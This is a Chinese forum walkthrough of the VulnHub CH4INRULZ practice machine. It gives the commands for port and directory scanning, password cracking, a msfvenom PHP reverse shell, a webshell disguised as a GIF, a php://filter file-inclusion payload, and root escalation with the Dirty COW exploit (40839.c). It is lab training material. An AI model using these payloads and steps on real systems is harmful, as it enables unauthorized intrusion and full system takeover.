vulnhub CH4INRULZ靶场

打印 上一主题 下一主题

主题 918|帖子 918|积分 2754

1.信息收集

扫描主机
sudo arp-scan -l

扫描端口
nmap -p- 192.168.42.151

查看端口服务
nmap -A -sV -p 21,22,80,8011


21端口 ftp 没有有效信息,所以重点在80,8011
2.漏洞挖掘

开始网站浏览

没找到有用信息,开始网站目录搜索(因为默认为80端口,所以我们要扫描8011端口)
dirb http://192.168.42.151
dirb http://192.168.42.151:8011


dirb http://192.168.42.151 -X .bak

查看源代码,发现敏感目录,登录账号
cat index.html.bak
192.168.42.151/development/

发现密码格式不对,暴力破解密码成功
john 1.txt

登录deve界面,读题发现上传。

访问/api页面,发现文件包含漏洞,尝试利用

get型的利用被WAF了

3.漏洞利用

找到上传口
192.168.42.151/development/uploader/

3.1msf生成php木马

msfvenom -p php/reverse_php lhost=192.168.42.151 lport=8888 -o shell.php
是反弹shell,写自己地址

3.2kali自带的php木马

/usr/share/webshells/php/

改前面GIF98,后缀.gif

木马上传成功

找不到上传路径,继续文件包含

尝试读取源代码
php伪协议
尝试读取源代码
file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php

得到源代码,发现上传路径
[code][/code]用文件包含目录调用木马
file=/var/www/development/uploader/FRANKuploads/shell.gif

反弹shell

4.提升权限

查看内核版本,内核提权
uname -a

在漏洞库中查找(脏牛提权)
searchsploit dirty

下载提权脚本
searchsploit -m linux/local/40839.c

上传脚本(nc 上传)
攻击机

受害机

在受害机编译脚本
gcc -pthread dirty.c -o dirty -lcrypt

执行脚本(可以先看看有没有执行权限)
./dirty 123456
看见firefart用户就成功

提权成功
su firefart


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

自由的羽毛

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表